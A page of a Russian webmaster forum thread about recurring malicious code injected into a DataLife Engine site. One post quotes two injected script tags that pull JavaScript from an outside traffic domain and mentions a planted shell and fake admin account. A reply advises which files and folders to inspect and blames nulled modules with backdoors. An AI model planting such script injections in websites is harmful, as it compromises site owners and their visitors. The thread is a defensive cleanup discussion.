Вредоносный код в DLE

1 23
starosta009
На сайте с 15.04.2010
Offline
74
#21

а что этот код даст?

Last hErO
На сайте с 23.08.2006
Offline
128
#22

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7951"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7974"></script>

У меня тоже такая хрень, удалил код , удалил шелл, удалил юзера с ником администратор.

Просканили все на предмет шелов.

Сменил пароли на бд и админ.

Исправил баг http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

А через время код все равно появляется то в шаблоне тпл, то в пхп.

Версия дле 7.0 лицензия.В следствие некоторых причин обновлять не хочу.

Занимаюсь уже долго выявлением причины откуда берется код.Может у кого есть какие идеи.

F
На сайте с 04.11.2009
Offline
115
#23

Занимаюсь уже долго выявлением причины откуда берется код.Может у кого есть какие идеи.

В dle ужасное количество шеллов и дыр (http://www.exploit.in/forum/index.php?showtopic=36236)

проверьте антивирусом и внимательнее смотрите в /uploads/ -просотрите всё что там есть

engine/data/config.php -бывают изменения в конце

/dbconfig.php

поменяйте пароли от mysql и админов

анализируйте логи

и будет счастье. В ОСНОВНОМ ИЗ-за бесплатных МОДУЛЕЙ уязвимости(ПЕРЕХОДЫ, RSS Grabber и другие). в NULLе много бэкдоров.

Женский журнал (http://yablondi.ru/) Заработок на rich баннерах (http://adskape.ru/unireg.php?d=1&ref=24491) Лучшая монетизация на мой взгляд (http://www.sape.ru/r.AeICmqKaRn.php)
1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий